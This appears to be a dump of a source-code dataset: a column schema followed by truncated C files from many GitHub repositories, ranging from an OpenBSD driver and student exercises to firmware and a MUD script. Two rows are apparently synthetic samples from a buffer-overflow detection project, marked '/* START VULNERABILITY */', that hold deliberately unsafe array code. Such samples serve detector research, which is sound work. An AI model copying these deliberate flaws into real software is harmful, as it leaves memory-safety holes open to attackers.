blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
2
268
content_id
stringlengths
40
40
detected_licenses
listlengths
0
58
license_type
stringclasses
2 values
repo_name
stringlengths
5
118
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
816 values
visit_date
timestamp[us]
revision_date
timestamp[us]
committer_date
timestamp[us]
github_id
int64
2.31k
677M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
23 values
gha_event_created_at
timestamp[us]
gha_created_at
timestamp[us]
gha_language
stringclasses
151 values
src_encoding
stringclasses
33 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
3
10.3M
extension
stringclasses
119 values
content
stringlengths
3
10.3M
authors
listlengths
1
1
author_id
stringlengths
0
228
b10feb621786a33a292380e153553124d14f1b97
099125525f25327f4e50c492dd27b425d95428a5
/sys/dev/pci/mpi_pci.c
a92a15eac8ec380fdb0d40a607af0764d9f3d6ae
[]
no_license
bradla/OpenBSD-Hammer2
2d9223e167347fea59afc7866deb8c5e9c7bd167
3cdc26721c09a4e3b6c18086d544a386330af59d
refs/heads/master
2021-01-21T05:05:20.249320
2014-10-18T07:27:28
2014-10-18T07:27:28
19,660,090
18
2
null
null
null
null
UTF-8
C
false
false
6,013
c
/* $OpenBSD: mpi_pci.c,v 1.24 2011/06/09 04:55:44 deraadt Exp $ */ /* * Copyright (c) 2005 David Gwynne <dlg@openbsd.org> * Copyright (c) 2005 Marco Peereboom <marco@openbsd.org> * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided tha...
[ "brad@Brads-MacBook-Pro-2.local" ]
brad@Brads-MacBook-Pro-2.local
da0aefe3c8bf949b7b51f5ea7d99abadf9fd9bff
c7db84c9662acce27135cb7f1706e08bcf2d44a4
/String-Algo/11365v1.c
3e97f9d1a2316c4bf90dccce0add374fe00f5803
[]
no_license
michaelsong93/acmicpc
e8c24befbd96548e8029b6bad240eff861a0fcb9
e54fd7b515b030759fd39b590a33c301a68caa1e
refs/heads/master
2023-01-08T22:50:38.652642
2020-11-11T09:18:38
2020-11-11T09:18:38
270,935,151
0
0
null
null
null
null
UTF-8
C
false
false
580
c
#include <stdio.h> #include <string.h> char stringChar[505] = {0}; char stringCopy[505] = {0}; int main(){ while(1){ scanf("%[^\n]s", stringChar); getchar(); if(stringChar[0] == 'E' && stringChar[1] == 'N' && stringChar[2] == 'D') break; int index = 0; for(int i = ...
[ "ss7277@seas.upenn.edu" ]
ss7277@seas.upenn.edu
c77fa31c01f72b70a91981f6239609de1ec62354
42bd5d30be718a71f610ecd7b00a4fca379f08e3
/content/seminars/ia/asm_c_examples/arr_malloc.c
bbcb5ca9fdb3c387e59f65e6ea4114dfd3b0ae80
[]
no_license
freeuni-paradigms/freeuni-paradigms.github.io
f839ec6f8c074d3ca7c8f509e7b426441951cab9
2ba74fcf2ccff8c805dd586d97a9fbe1598f11db
refs/heads/master
2023-03-10T20:30:38.374525
2020-11-05T08:59:34
2021-02-18T14:33:02
296,073,038
1
7
null
2021-01-31T21:12:24
2020-09-16T15:27:27
Scheme
UTF-8
C
false
false
135
c
#include <stdlib.h> int main() { short scores[4]; scores = (short *) malloc(100); int scores2[4]; scores2 = (int *) malloc(100); }
[ "marvinzem@gmail.com" ]
marvinzem@gmail.com
cefaf75c549bd12d00c779c07b7ddda22fbde914
ab36a034b0026227a7781655ea064c37fa833a44
/code/myfun/mydate.c
4736dcf12942b0b927f0c9661de07b29e70df355
[ "MIT" ]
permissive
gaoshanmicai/COMLearn
2b735fa8f26194fca8ade4c578f018c6de3247fd
479eb91dd5a155f2804125ad9afc443bb90c92ae
refs/heads/master
2023-07-06T04:45:45.604430
2023-07-04T01:32:51
2023-07-04T01:32:51
138,290,966
0
0
null
null
null
null
UTF-8
C
false
false
238
c
#include<stdio.h> #include<string.h> int main() { printf("\n%s,%d",__FILE__,__LINE__); printf("\n%s:%s",__DATE__,__TIME__); if(__STDC__) printf("\nANSI C"); else printf("NOT ANSIC\n"); return 0; }
[ "yuanqiang@asreader.cn" ]
yuanqiang@asreader.cn
018ee47a57ee4ada6da3039abea87983d62d0a3c
d819a644b39ee20a2b788b9a284e1b5aa33ee7e9
/src/c/temperature-layer.c
2b49d01689e8c8049bbe24752b3f226721642184
[ "MIT" ]
permissive
dmorgan81/constructor
a1397c4d0e2c78cde894a6dd7311905fa6f463e7
c0ddca4bc83747a56c4a200d0d7acd1cfccce466
refs/heads/master
2021-06-18T15:07:18.030968
2017-06-01T19:11:18
2017-06-01T19:11:18
75,427,386
1
0
null
null
null
null
UTF-8
C
false
false
3,738
c
#ifndef PBL_PLATFORM_APLITE #include "common.h" #include <pebble-fctx/fctx.h> #include <pebble-generic-weather/pebble-generic-weather.h> #include "fonts.h" #include "fctx-rect-layer.h" #include "fctx-text-layer.h" #include "weather.h" #include "temperature-layer.h" typedef struct { char buf[32]; FctxRectLayer ...
[ "dmorgan81@gmail.com" ]
dmorgan81@gmail.com
061dba21e39ffad67f232111688c0cc407d41255
66173e2dc61a555b6a447b70bcd9383a4b70f268
/firmware/proyectoGases/soc-hw.h
871b00dac61df604a416157609214f72849a6af5
[]
no_license
lcparadaa/Digital-II
e182b36aa99765ba2fa4471b5623c7ddcb0e8e46
28ae54f890359ab2ac17c5815a145e402f884dae
refs/heads/master
2021-08-22T15:25:53.911920
2017-11-30T14:51:24
2017-11-30T14:51:24
104,105,643
1
0
null
null
null
null
UTF-8
C
false
false
3,071
h
#ifndef SPIKEHW_H #define SPIKEHW_H #define PROMSTART 0x00000000 #define RAMSTART 0x00000800 #define RAMSIZE 0x400 #define RAMEND (RAMSTART + RAMSIZE) #define RAM_START 0x40000000 #define RAM_SIZE 0x04000000 #define FCPU 100000000 #define FSPI 40000000 #define UART_RXBUFSIZE 32 /****************...
[ "daesantosbo@unal.edu.co" ]
daesantosbo@unal.edu.co
d70f93933fe1fbaf4c4c2057808314daa01280be
a6d4496ab515fa9c278affd9217c5f1660b90717
/c_python_integration/test_v11-makefile_matrix_class/include/UtilityFunctions.h
a22cd06ce8b92dead3890dc0533a6df268485ec3
[]
no_license
jgolebiowski/coding-workspace
092eb372cec37e99c83dc9b39382fb572648a73d
0101dc52d0e3a76911d159307b255f6ce6c547d3
refs/heads/master
2021-07-03T08:06:05.843905
2019-03-13T21:09:09
2019-03-13T21:09:09
79,723,950
0
0
null
null
null
null
UTF-8
C
false
false
242
h
#pragma once extern "C" { void hello_world(); void square_array(double * data_array, int nrows, int ncols); void square_matrix(double * data_array, int nrows, int ncols); void square_mymatrix(MyMatrix & data_mymatrix); } // End of extern C
[ "jacek.golebiowski14@imperial.ac.uk" ]
jacek.golebiowski14@imperial.ac.uk
664992ed58c3d24114c4da055221b0079349dae1
c607426141b48123dc7687179ed9b4f641752762
/value.c
5fd4a33f2bd3a99c0a06cc5f7bf6265dfee712c0
[]
no_license
gtbr312/resume-fend-compiler
d804805ec421ebf877ebaf191ede50504cd35abb
d9f1493fa0b8c1a3206e3376635273f50cd3a426
refs/heads/main
2023-07-30T18:23:01.526340
2021-09-30T04:27:28
2021-09-30T04:27:28
411,119,172
0
0
null
null
null
null
UTF-8
C
false
false
1,898
c
#include <stdio.h> #include <string.h> #include "memory.h" #include "value.h" #include "object.h" void initValueArray(ValueArray* array){ array->values = NULL; array->capacity = 0; array->count = 0; } void writeValueArray(ValueArray* array, Value value){ if(array->capacity < array->count + 1){ ...
[ "matthew@Matthews-MacBook-Air.local" ]
matthew@Matthews-MacBook-Air.local
6074fc682450a54ed9e5439257c3074e5211bfab
3e354477ee743ff4c90991da30aee25058347b30
/C-C++/编程例题/实验3-3-1.c
93fff8d1ecaf56a377940f80e4f748d20fb22800
[]
no_license
zongxinqi/Code
2585218e3f8d5fa55523c3683d5c2ab2b8ca3e08
bfde924b525bdccdf5720a6286788fbe857f5bfc
refs/heads/master
2020-03-09T22:40:00.903283
2018-05-12T08:11:04
2018-05-12T08:11:04
129,039,622
1
0
null
null
null
null
UTF-8
C
false
false
470
c
#include<stdio.h> #include<string.h> #define N 5 #define MAX_LEN 20 void sortstring(char *p[N]); int main() { int i,n; char string[N][MAX_LEN],*p[N]; for(i=0;i<5;i++) { p[i]=string[i]; gets(p[i]); } sortstring(p); for(i=0;i<5;i++) { puts(p[i]); } return 0; } void sortstring(char *p[N]) { int i,j; cha...
[ "32828039+zongxinqi@users.noreply.github.com" ]
32828039+zongxinqi@users.noreply.github.com
72f1c3249a2ff1bd73d95e39e1bfbb495f6bf8fe
72387d56d5057e0becbc14aebd354040868cd935
/ex00/ft_strdup.c
ccd3aeaf57e67c4ca250b906a928b5a81126414b
[]
no_license
42-july-2019/C07
d2738fc18b95b4f790fb4611fbfad9c320f8d691
edac99a3a8d30099651bf1d3ab872c2e40a36780
refs/heads/master
2020-06-24T00:09:12.302394
2019-07-19T09:44:48
2019-07-19T09:44:48
198,791,128
1
0
null
null
null
null
UTF-8
C
false
false
1,174
c
/* ************************************************************************** */ /* */ /* ::: :::::::: */ /* ft_strdup.c :+: :+: :+: ...
[ "alabreui@student.42.fr" ]
alabreui@student.42.fr
fc4f1c1eaaa1095ce14ecea98437818950171e31
764d576236039d5e43fa06dd3a48b99c758d4f8e
/ext-libs/STM32Cube_FW_F7_V1.2.0/Projects/STM32756G_EVAL/Applications/Display/LTDC_Paint/Inc/color2.h
374e3690afd8108681ef046f8ea03d9a6f09c406
[ "BSD-2-Clause" ]
permissive
pellepl/verisure1612
7740321ebb48d947a09237ced3d28cbf45581384
0943e2b5701fe6a2d38c3bdb2c983a30292ffe5d
refs/heads/master
2023-06-11T15:57:40.181756
2016-12-29T18:25:39
2016-12-29T18:28:38
76,242,972
1
1
null
null
null
null
UTF-8
C
false
false
142,083
h
/** ****************************************************************************** * @file Display/LTDC_Paint/Inc/color2.h * @author MCD Application Team * @version V1.0.2 * @date 21-September-2015 * @brief This file contains image used for LTDC application. ***************************...
[ "pelleplutt1976@gmail.com" ]
pelleplutt1976@gmail.com
5f00aa9bf906247a7c499a9d2df680fe30b61a17
87dd1de7293526f3c3a29d2949555f7662e2e52b
/analyticGeometry01.c
6fd77eebbdfa694cf485ec7bfe02be58105db148
[]
no_license
CMDody/GitHub_C
cbdd13e74b53916361e4f8550598997783fc0018
9a0e3b691a316e6a426f8e49c8aad2b5e414b820
refs/heads/master
2021-05-02T12:16:46.197829
2017-01-21T06:15:36
2017-01-21T06:15:36
54,503,436
0
0
null
2016-03-24T03:03:25
2016-03-22T19:35:57
C
UTF-8
C
false
false
2,570
c
#include <stdio.h> #include <stdlib.h> #include <math.h> //================================================================= double distance(double x1, double y1, double x2, double y2); double slope(double x1, double y1, double x2, double y2); double midPointX(double x1, double x2); double midPointY(double y1, double...
[ "cmdodanli78@hotmail.com" ]
cmdodanli78@hotmail.com
82b2b0d61260a0b188ef9026cf9b2b57c770fca6
c5b9a583feea7717bfb401e2a95690642c838b91
/d/player_houses/silesse/obj/silesse_dragon.c
f9732a32a2c6de2e6263dae59ac1b1adc13385c3
[ "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
SunderingYves/shadowgate
adeabd8ef37c43d353a1d52abc427290ea6a31b4
13844fe89d4253ab1a79488e77f6493066918559
refs/heads/master
2023-07-16T14:21:31.270426
2021-09-02T01:00:04
2021-09-02T01:00:04
null
0
0
null
null
null
null
UTF-8
C
false
false
6,136
c
//Guardian for Silesse and Vicdaerrysn's dungeon. Based on Geonslu after //discussions with other Imms. ~Circe~ 1/7/13 //Stats, etc., are the same, though I removed the save functions and adjusted //messages to make this dragon unique. #include <std.h> #include "../sil.h" inherit WEAPONLESS; void create(){ ::cr...
[ "nm0i@me0w.net" ]
nm0i@me0w.net
a7c095c6c8ef87280e5671d795ff59f844f4c65a
d5b1e0859ddbab545523bcb1f17a25d0e33a2966
/platform/common/mp3_helix.c
2afedf3dffc5ffbd465a601eb896081fbc3c2d6b
[]
no_license
frantony/picodrive-opendingux-rzx50
d2b87ada696f175da2ecbae3769c64bbec8826a1
32b47baf335b6e0a94514a5faf552bc29c7b81c4
refs/heads/master
2021-01-02T22:49:50.335594
2012-07-28T12:28:47
2012-07-28T20:14:44
5,220,645
2
1
null
null
null
null
UTF-8
C
false
false
715
c
// Some mp3 related code for Sega/Mega CD. // Uses the Helix Fixed-point MP3 decoder // (c) Copyright 2007, Grazvydas "notaz" Ignotas #include <stdio.h> #include <string.h> #include "../../Pico/PicoInt.h" #include "../../Pico/sound/mix.h" #include "lprintf.h" int mp3_get_bitrate(FILE *f, int len) { return 0; } #...
[ "de_ding0@mail.ru" ]
de_ding0@mail.ru
a963b666795dc9caad5957f836bd992aa1a4f5ab
c2cedcf36667730f558ab354bea4505b616c90d2
/players/eurale/Hotel/NPC/beckworth.c
1449474f9cd68401952c96fb75e3e79f1eb3bb30
[]
no_license
wugouzi/Nirvlp312mudlib
965ed876c7080ab00e28c5d8cd5ea9fc9e46258f
616cad7472279cc97c9693f893940f5336916ff8
refs/heads/master
2023-03-16T03:45:05.510851
2017-09-21T17:05:00
2017-09-21T17:05:00
null
0
0
null
null
null
null
UTF-8
C
false
false
899
c
/* Jim Beckwourth */ #include "defs.h" inherit "obj/monster"; reset(arg) { object gold; ::reset(arg); if(arg) return; set_name("jim"); set_race("human"); set_short("Jim Beckwourth"); set_alias("beckwourth"); set_long( " James Pierson Beckwourth (c.1798-1866) Black pioneer mountain \n"+ "man, fur trader and scou...
[ "rump.nirv@gmail.com" ]
rump.nirv@gmail.com
ce8ece1813433b53c067fed7a6f5539c9ed11060
446851cf4d48694c5dca562b5167382d83600cca
/avr-Copy/main/canDriver.c
7b2cd068782ecf2eeb219c38ce87649abad33613
[]
no_license
freazert/Automotive-project
ed0ed23d9e072823261dfd1ac0b749a4a404e047
14b5f1f8ad97d49f67d3ab28f7fdcd4f3688ef2e
refs/heads/master
2020-04-01T18:13:52.537875
2018-10-17T15:30:13
2018-10-17T15:30:13
153,480,118
0
0
null
null
null
null
UTF-8
C
false
false
9,324
c
/* * canDriver.c * * Created: 16/05/2018 14:57:09 * Author: Kris */ #include "headers/canDriver.h" void canInitSendOne(uint16_t can_id, char mob, char length); void canInitReceiveOne(uint16_t can_id, char mob, char length); /*! \brief initialize the can driver. * * initialize function pointers * * do softw...
[ "kris.vandevoorde@student.uantwerpen.be" ]
kris.vandevoorde@student.uantwerpen.be
826f0a9dcf5b278c05642b804060fc6be0748edf
5838cf8f133a62df151ed12a5f928a43c11772ed
/NT/com/netfx/src/clr/jit/ia64/block.h
811763835d7ef5df4ce2be9c7a27ab6bed7ad840
[]
no_license
proaholic/Win2K3
e5e17b2262f8a2e9590d3fd7a201da19771eb132
572f0250d5825e7b80920b6610c22c5b9baaa3aa
refs/heads/master
2023-07-09T06:15:54.474432
2021-08-11T09:09:14
2021-08-11T09:09:14
null
0
0
null
null
null
null
UTF-8
C
false
false
13,281
h
// ==++== // // Copyright (c) Microsoft Corporation. All rights reserved. // // ==--== /*XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX ...
[ "blindtiger@foxmail.com" ]
blindtiger@foxmail.com
36a70ad62c159d0ea22fe31cc151ea2be95683e6
1db9e9c20e3a0a5673f6fbec040d1c4bba437c15
/kernel/drivers/keyboard.c
79b70fb59acece7ddf60ce1ad9c3626263d75d02
[]
no_license
DorianXGH/Lucarne
83d2f1bcb6ef560f606b68bd8f36a4546ee758e4
5197cc89e51f1a2b667e4b07b47e37d87a644c22
refs/heads/master
2020-07-19T03:58:43.206106
2020-01-16T20:47:06
2020-01-16T20:47:06
206,369,817
1
1
null
2019-11-29T12:50:07
2019-09-04T16:59:59
C
UTF-8
C
false
false
7,035
c
#include "keyboard.h" #include "port.h" #include "../isr.h" #include "screen.h" #include "../util.h" #include "../shell/shell.h" extern struct def_vga_screen default_screen; extern struct def_shell default_shell; static void keyboard_callback(registers_t * regs) { /* The PIC leaves us the scancode in port 0x60 */...
[ "dorian.bourgeoisat@icloud.com" ]
dorian.bourgeoisat@icloud.com
192dbfa96b49a7e053dead4536a4f20c1f769ae3
128064b10f5349105d88bc936d25e738dea13856
/re2c/test/default_full.x--encoding-policy(substitute).c
6c8b09c88eb2d51c7371fc03bf45f3d842c5935b
[ "LicenseRef-scancode-warranty-disclaimer", "LicenseRef-scancode-public-domain" ]
permissive
cNoNim/re2c
a454a3a4be9c0ca2497fbff0995cef98d7b5ab6f
764efed942e36b4455f7dba26824c9e6bfc7bef0
refs/heads/master
2021-01-23T03:04:01.235872
2015-03-26T12:00:58
2015-03-26T12:00:58
32,870,911
0
1
null
null
null
null
UTF-8
C
false
false
733
c
/* Generated by re2c */ #line 1 "default_full.x--encoding-policy(substitute).re" #line 5 "<stdout>" { YYCTYPE yych; if ((YYLIMIT - YYCURSOR) < 2) YYFILL(2); yych = *YYCURSOR; if (yych <= 0xD7FF) goto yy2; if (yych <= 0xDBFF) goto yy4; if (yych <= 0xDFFF) goto yy6; yy2: ++YYCURSOR; yy3: #line 3 "default_full.x-...
[ "skvadrik@gmail.com" ]
skvadrik@gmail.com
165650210d87b14bb8348e72caf0dce268a93cba
2a55a93a28860d13e803f533e77ec5948946a98a
/Resident.h
b6279efdea6d2b61c3923c0214a50adf50c8e34a
[]
no_license
gaFregatto/siguel
a4d2a80274d200b047d628f07266f44be3ada58b
43a1da0511373ca700220f2b3c1301a5e4d578c3
refs/heads/master
2020-05-03T20:20:21.606623
2019-04-01T06:41:18
2019-04-01T06:41:18
null
0
0
null
null
null
null
UTF-8
C
false
false
1,785
h
#ifndef Resident_h #define Resident_h #include <stdio.h> #include <stdlib.h> /** Esse é o módulo moradores, que auxília na criação e manipulação de operações com moradores. Um morador é definido por um cpf, cep, face, número e complemento. */ /** Cria um apelido Resident para void*. */ typedef void* Resident; /**...
[ "guilherme_arai19@hotmail.com" ]
guilherme_arai19@hotmail.com
6d7828ea4f91ce986b24a1df0f60c118f27644bf
478e596980c62692d638a33ec5312f08a9bd6953
/JD_Challenges/JD_Challenges/client/src/read_and_write.c
9b6c86a4abb3602e26e3d60279286888bd4cf244
[]
no_license
IsmaGuettab/ProjetJd
c17820281ac7117e39cade3fc567d88d2e873455
55aa3efd642d69f7e589ce2c5315fe466a4cacce
refs/heads/main
2022-12-20T02:12:22.248704
2020-10-30T09:00:12
2020-10-30T09:00:12
308,559,233
0
0
null
null
null
null
UTF-8
C
false
false
628
c
// // Created by Benjamin. // benjamin.dupuis@epitech.eu // #include "../include/project.h" #include <sys/socket.h> #include <netinet/in.h> #include <zconf.h> #include <stdio.h> #include <stdlib.h> #include <string.h> int write_function(client_t *client, select_t *select) { if (select->type == 2) { write...
[ "noreply@github.com" ]
IsmaGuettab.noreply@github.com
cef211f3f67949d82f7cd37a71a250ce80431ff8
4b850a465b62218ba793c418287b8b2feadc0f7b
/mp9/maze.c
a988396bd5d4a94bb059129ae18aee964be5dfc1
[]
no_license
mftoy/ComputerSystemsEngineering-ECE220-Fall2019
a6489275083d27eb4369a001df86f1d466edcfc2
433a8287d7d1184e7ba0a75388a5ec0d242a2603
refs/heads/master
2021-01-02T07:52:47.220374
2020-02-10T18:32:09
2020-02-10T18:32:09
239,555,663
0
0
null
null
null
null
UTF-8
C
false
false
7,171
c
/* INTRO PARAGRAPH In this file, I have createMaze, destroyMaze, printMaze and solveMazeDFS functions. createMaze: This function reads the file and assign maze variable. For file is opened for read. Number of rows and columns are read and assigned in the maze_t struct. Then I allocate ...
[ "noreply@github.com" ]
mftoy.noreply@github.com
e8ee53a75d11fa8a835446c6914f9855c0bbf4fc
5c255f911786e984286b1f7a4e6091a68419d049
/vulnerable_code/6e4d708d-a6a0-431a-9d90-9df8377b51f7.c
885fef20c241ceaa6ae12e1fd27e4c50fd4f0aab
[]
no_license
nmharmon8/Deep-Buffer-Overflow-Detection
70fe02c8dc75d12e91f5bc4468cf260e490af1a4
e0c86210c86afb07c8d4abcc957c7f1b252b4eb2
refs/heads/master
2021-09-11T19:09:59.944740
2018-04-06T16:26:34
2018-04-06T16:26:34
125,521,331
0
0
null
null
null
null
UTF-8
C
false
false
606
c
#include <string.h> #include <stdio.h> int main() { int i=0; int j=12; int k; int l; k = 53; l = 64; k = i/j; l = i/j; l = l/j; l = l/j; l = l/j; l = i%j; l = l+j; i = k-k*i; //variables //random /* START VULNERABILITY */ int a; int b[41]; int c[40...
[ "nharmon8@gmail.com" ]
nharmon8@gmail.com
f38db29fa7fd842f9cbbbe9775820417df12a4ae
bd226f79c8ca112fefbbd0e9525bdc7f9167cf71
/usr/src/linux-headers-3.13.0-163-generic/include/linux/console.h
1ed4d2294acb266e3ecf088aea98a51c30cf803f
[]
no_license
micro1964/streamnow
e53f1a1b33ad0386978e6c17c878140e9e945d93
ba2a4f1a5293d91b0279339c3722aecbdc08ca4c
refs/heads/master
2022-11-30T17:34:48.175628
2019-03-30T22:05:48
2019-03-30T22:05:48
178,615,166
0
2
null
2022-11-25T07:46:15
2019-03-30T21:52:51
C
UTF-8
C
false
false
57
h
../../../linux-headers-3.13.0-163/include/linux/console.h
[ "root@Streamnow.localdomain" ]
root@Streamnow.localdomain
01abab002faabf79cdcacf3eb05e496001a90c4d
7080822e4e2d2319a35388d519617e32e898515e
/BF.C
5a85ab8ff4acc3f294058e04c94b82b399c9aa28
[]
no_license
hwchae07/macros
38bc41afe479f23aaaa40fd4eb5f192b0c32a839
76ea9f51b8fb3a46e84b4499d3c73ed30175395e
refs/heads/master
2021-01-23T11:19:53.330156
2018-01-22T05:20:09
2018-01-22T05:20:09
93,127,013
0
0
null
null
null
null
UTF-8
C
false
false
938
c
void BF(Int_t runNum, const char *det1, const char *det2 = 0, const char *det3=0, const char *det4=0, const char *det5=0, const char *det6=0, const char *det7=0, const char *det8=0, const char *det9=0, const char *det10=0) { TFile *file = new TFile(Form("./root/run%04d.root.%s",runNum,det1),"read"); TTree...
[ "hwchae07@gmail.com" ]
hwchae07@gmail.com
bd9b856ab940d2b031114db791b2369f3e594716
36b466bbadedab0a2505d3f526b8be5da7916a07
/Example/Pods/Headers/Private/WGFileDemixionKit/MF_Base64Additions.h
515b74bf37aad91b24fdd9f85972fcaffc00994e
[ "MIT" ]
permissive
wgModularization/WGFileDemixionKit
24a074fc5fa3a8ec232d2e7472892b77c1fd1387
fbf5b68091b520206c3c897824fc5f6f31f57113
refs/heads/master
2020-03-27T05:58:22.402165
2018-08-25T06:50:43
2018-08-25T06:50:43
146,067,837
0
0
null
null
null
null
UTF-8
C
false
false
68
h
../../../../../WGFileDemixionKit/Classes/Base64/MF_Base64Additions.h
[ "wanggang@wanggangdeMacBook-Pro.local" ]
wanggang@wanggangdeMacBook-Pro.local
b19d35ff2507a0a9fc2d1cdd5a13331929b6eb29
f45d7a315f47304baa458dbc73efc77d1d88641c
/src/screenDrivers/kernel.c
74fcb65cd7fe8257a9f23d7dac8bc2c7e2f35422
[ "MIT" ]
permissive
geekskool/WriteYourOwnOS
24320f0dcc078eec5db048cb39f9c361bb2eda6d
dd5856302f73e8b5de19c20ce18e04aa7a970d7b
refs/heads/master
2021-01-10T11:20:39.934619
2015-06-02T14:51:47
2015-06-02T14:51:47
36,209,650
21
6
null
null
null
null
UTF-8
C
false
false
292
c
#include "screen.h" void main() { clear_screen(); kprint_at("X", 1, 6); kprint_at("This text spans multiple lines", 75, 10); kprint_at("There is a line\nbreak", 0, 20); kprint("There is a line\nbreak"); kprint_at("What happens when we run out of space?", 45, 24); }
[ "spmd92@gmail.com" ]
spmd92@gmail.com
3317166a23067dbff05baa8b34415d5caa3283aa
5c255f911786e984286b1f7a4e6091a68419d049
/vulnerable_code/1140efd2-634a-46be-af6e-d3ff490670d3.c
3a2d84902d313c79b31587c4d99634f5066e6656
[]
no_license
nmharmon8/Deep-Buffer-Overflow-Detection
70fe02c8dc75d12e91f5bc4468cf260e490af1a4
e0c86210c86afb07c8d4abcc957c7f1b252b4eb2
refs/heads/master
2021-09-11T19:09:59.944740
2018-04-06T16:26:34
2018-04-06T16:26:34
125,521,331
0
0
null
null
null
null
UTF-8
C
false
false
586
c
#include <string.h> #include <stdio.h> int main() { int i=0; int j=1242; int k; int l; k = 53; l = 64; k = i/j; l = i/j; l = i/j; l = l-j; l = l-j; l = l%j; l = i-j; k = k-k*i; //variables /* START VULNERABILITY */ int a; char b[61]; char c[68]; a ...
[ "nharmon8@gmail.com" ]
nharmon8@gmail.com
d4e518d961726b74428b19b00de231a96beb8ef2
976f5e0b583c3f3a87a142187b9a2b2a5ae9cf6f
/source/linux/lib/extr_test_parman.c_test_parman_lsort.c
af4b2ac143c9ee4dced866b5ed480728652864ae
[]
no_license
isabella232/AnghaBench
7ba90823cf8c0dd25a803d1688500eec91d1cf4e
9a5f60cdc907a0475090eef45e5be43392c25132
refs/heads/master
2023-04-20T09:05:33.024569
2021-05-07T18:36:26
2021-05-07T18:36:26
null
0
0
null
null
null
null
UTF-8
C
false
false
1,199
c
#define NULL ((void*)0) typedef unsigned long size_t; // Customize by platform. typedef long intptr_t; typedef unsigned long uintptr_t; typedef long scalar_t__; // Either arithmetic or pointer type. /* By default, we understand bool (as a convenience). */ typedef int bool; #define false 0 #define true 1 /* Forward d...
[ "brenocfg@gmail.com" ]
brenocfg@gmail.com
60aacd4a3798c71f5a462a8292dec1a738129bad
eb206203e6ba2f8dc3775d2b3b683490b903b6e5
/fermikit/htsbox/htslib/vcf.h
cef5040d8814ba3888ea5a9554db9194448f8a38
[ "MIT" ]
permissive
WGLab/LinkedSV
5cdb7c5b76399125037fbca3a8f9cccb5b0f0a03
b36b2410bd82a721677d8e0ad1ca65d3f60cfdd7
refs/heads/master
2023-08-03T21:30:55.796391
2023-08-01T15:39:28
2023-08-01T15:39:28
83,945,866
15
12
MIT
2023-08-01T15:39:29
2017-03-05T04:55:34
C
UTF-8
C
false
false
8,927
h
#ifndef BCF_H #define BCF_H #include <stdint.h> #include <limits.h> #include <assert.h> #include "bgzf.h" #include "hts.h" /***************** * Header struct * *****************/ #define BCF_HL_FLT 0 // header line #define BCF_HL_INFO 1 #define BCF_HL_FMT 2 #define BCF_HL_CTG 3 #define BCF_HT_FLAG 0 // header ...
[ "fangli0813@gmail.com" ]
fangli0813@gmail.com
efdbcbfcd20a7f8162908afc99301bb45ce6491a
830d19615851513ca8b563e2653e8a0d3a1d4074
/external/acpica/source/components/dispatcher/dswexec.c
63e863fee387cf1c2a52e5fcc3a06d8c6707a36b
[ "BSD-3-Clause" ]
permissive
objectkuan/osv-dde
da950b2a321aaa125c8877a6c63bf4edc9c0ccc3
295ade6050f3860b7863323b078473e0d11bf323
refs/heads/master
2021-01-01T05:47:28.018482
2014-10-24T14:18:47
2014-10-24T14:18:47
null
0
0
null
null
null
null
UTF-8
C
false
false
27,506
c
/****************************************************************************** * * Module Name: dswexec - Dispatcher method execution callbacks; * dispatch to interpreter. * *****************************************************************************/ /************************************...
[ "objectkuan@gmail.com" ]
objectkuan@gmail.com
906b3aab1460f22fd09dd8d8f011dd2c889054ff
1fabbdfd1ca9ea1b6808893e12bd907eb74de414
/xcode/Classes/Native/System_System_Text_RegularExpressions_Syntax_CharacterClassMethodDeclarations.h
d313f188434b983bcd87bbd799f9222300bdef0c
[]
no_license
Klanly/TutorialPackageClient
6f889e96c40ab13c97d107708ae8f3c71a484301
b9d61ba2f287c491c9565b432f852980ec3fee28
refs/heads/master
2020-12-03T01:42:35.256114
2016-11-01T02:40:21
2016-11-01T02:40:21
null
0
0
null
null
null
null
UTF-8
C
false
false
2,928
h
#pragma once #include <stdint.h> #include <assert.h> #include <exception> #include "codegen/il2cpp-codegen.h" // System.Text.RegularExpressions.Syntax.CharacterClass struct CharacterClass_t7316; // System.Text.RegularExpressions.ICompiler struct ICompiler_t7303; // System.Text.RegularExpressions.Category #include "Sy...
[ "bu213200@gmail.com" ]
bu213200@gmail.com
3f790be4a38c50db61fbf825b10adffd84c5b462
82093512461592d5492f65a1cfb0aa5f1e7bb944
/imagemagick/darwin/include/MagickWand/compare.h
0514427b742b9462c7f05f7cb81e475c4a808ac0
[ "Apache-2.0" ]
permissive
hayabusa/havana-clibs
f90d294fe7f21fe279393423688276de4c540115
861487c5805af36daa6ccb1e31e167c0c2c60f81
refs/heads/master
2022-07-07T01:52:17.955668
2019-11-15T07:14:56
2019-11-15T07:14:56
165,949,644
0
0
Apache-2.0
2019-11-15T07:15:01
2019-01-16T01:12:39
C
UTF-8
C
false
false
964
h
/* Copyright 1999-2019 ImageMagick Studio LLC, a non-profit organization dedicated to making software imaging solutions freely available. You may not use this file except in compliance with the License. obtain a copy of the License at https://imagemagick.org/script/license.php Unless required by ...
[ "nghialv2607@gmail.com" ]
nghialv2607@gmail.com
4fc6bba1726af9db119b3df67d10092e27eb3644
f892c3f839025e65bb111522ac86009f234e32dd
/test/unit/lib/event/reactor.c/reactor_ut.c
aaa1387442bdd16ea69df9305aa875cbd83c7677
[ "Intel", "BSD-3-Clause" ]
permissive
optimistyzy/spdk
88fa9c37a3d59efbd940a7b62dfdfe55a72a9370
9f5e3c99f25af5d8a4ec973d459ed76ed4b36d8c
refs/heads/master
2021-07-01T03:49:27.173656
2021-05-26T23:21:34
2021-06-01T07:43:12
50,647,376
1
0
null
2017-11-22T07:15:08
2016-01-29T07:51:13
C
UTF-8
C
false
false
24,006
c
